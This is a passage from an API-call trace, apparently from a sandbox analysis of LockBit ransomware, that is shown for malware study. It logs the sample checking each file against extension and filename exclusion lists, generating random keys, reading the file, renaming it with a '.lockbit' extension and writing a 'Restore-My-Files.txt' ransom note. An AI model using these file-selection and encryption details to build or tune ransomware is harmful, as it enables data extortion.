lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.609] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.610] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.610] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00122_.WMF") returned 1 [0106.611] lstrcmpiW (lpString1="ntldr", lpString2="BL00122_.WMF") returned 1 [0106.611] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00122_.WMF") returned 1 [0106.611] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00122_.WMF") returned 1 [0106.611] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00122_.WMF") returned -1 [0106.611] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00122_.WMF") returned 1 [0106.611] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00122_.WMF") returned 1 [0106.611] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.611] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned=".WMF" [0106.611] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.611] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.611] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.612] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.613] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.613] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.lockbit") returned 72 [0106.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0106.614] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.614] malloc (_Size=0x40068) returned 0x3db00b8 [0106.615] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=10146) returned 1 [0106.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0106.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0106.617] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0106.628] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.628] malloc (_Size=0xa6) returned 0x77d800 [0106.628] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.629] free (_Block=0x77d800) [0106.629] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.629] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.629] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.630] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fc8c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39fc8c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x5b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00130_.WMF", cAlternateFileName="")) returned 1 [0106.630] lstrcmpiW (lpString1=".", lpString2="BL00130_.WMF") returned -1 [0106.630] lstrcmpiW (lpString1="..", lpString2="BL00130_.WMF") returned -1 [0106.630] PathFindExtensionW (pszPath="BL00130_.WMF") returned=".WMF" [0106.630] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.630] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.631] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.631] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.632] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00130_.WMF") returned 1 [0106.632] lstrcmpiW (lpString1="ntldr", lpString2="BL00130_.WMF") returned 1 [0106.632] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00130_.WMF") returned 1 [0106.632] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00130_.WMF") returned 1 [0106.632] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00130_.WMF") returned -1 [0106.632] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00130_.WMF") returned 1 [0106.632] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00130_.WMF") returned 1 [0106.632] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.633] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned=".WMF" [0106.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.633] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.633] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.634] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.634] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.lockbit") returned 72 [0106.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.635] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.635] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.635] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1464) returned 1 [0106.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.636] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.646] malloc (_Size=0xa6) returned 0x77d800 [0106.646] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.647] free (_Block=0x77d800) [0106.647] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.647] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.647] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.647] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c58200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83c58200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00148_.WMF", cAlternateFileName="")) returned 1 [0106.647] lstrcmpiW (lpString1=".", lpString2="BL00148_.WMF") returned -1 [0106.647] lstrcmpiW (lpString1="..", lpString2="BL00148_.WMF") returned -1 [0106.647] PathFindExtensionW (pszPath="BL00148_.WMF") returned=".WMF" [0106.647] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.647] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.648] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.649] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.649] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00148_.WMF") returned 1 [0106.649] lstrcmpiW (lpString1="ntldr", lpString2="BL00148_.WMF") returned 1 [0106.649] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00148_.WMF") returned 1 [0106.649] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00148_.WMF") returned 1 [0106.650] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00148_.WMF") returned -1 [0106.650] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00148_.WMF") returned 1 [0106.650] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00148_.WMF") returned 1 [0106.650] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.650] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned=".WMF" [0106.650] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.650] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.650] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.651] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.651] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.lockbit") returned 72 [0106.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 